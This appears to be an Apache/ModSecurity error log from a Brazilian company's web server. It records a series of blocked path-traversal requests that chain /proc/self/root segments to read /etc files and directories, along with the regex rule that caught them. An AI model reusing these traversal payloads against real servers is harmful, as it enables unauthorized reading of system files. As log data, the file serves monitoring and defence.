[Mon Mar 16 13:04:20.337054 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:36414] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqBLABkC4fWIHEf8HtDwAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:04:21.436485 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:60312] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqBXbQATo66fKoS7xSFwAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:26.671186 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:35326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqCbABkC4fWIHEf8HtFQAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:26.674872 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:32872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqCv9ocpUE4ed4uDzwvAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:29.128686 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:32874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqDdSswJuvopo3lOhhJAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:04:32.898006 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:35336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqEAlT9VtDQc7bgUy07gAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:34.174607 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:41248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqEtSswJuvopo3lOhhKQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:35.351071 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:41264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqE9SswJuvopo3lOhhLAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:36.562704 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:41276] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqFHjZBu2q05ozVU9Z4wAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:37.823375 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:41280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqFRXjF1vJNtV6CWr4OAAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:04:38.977890 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:41282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqFhXjF1vJNtV6CWr4OQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:05:02.474054 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:35732] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqLglT9VtDQc7bgUy1LQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:03.820538 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:58566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqL3bQATo66fKoS7xSHQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:05.123035 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:58568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqMY6lpbStxTqkSktuOwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:07.546417 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:58584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqM9SswJuvopo3lOhhNgAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:14.072871 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:58596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqOpqj1wV0Si-OkefwFgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:16.475583 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:60126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqPHjZBu2q05ozVU9aEAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:17.850216 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:60134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqPbABkC4fWIHEf8HtPAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:19.161317 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:60146] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqPwlT9VtDQc7bgUy1QwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:20.430225 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:45914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqQAlT9VtDQc7bgUy1RwAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:05:23.334250 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:45926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgqQpqj1wV0Si-OkefwGgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
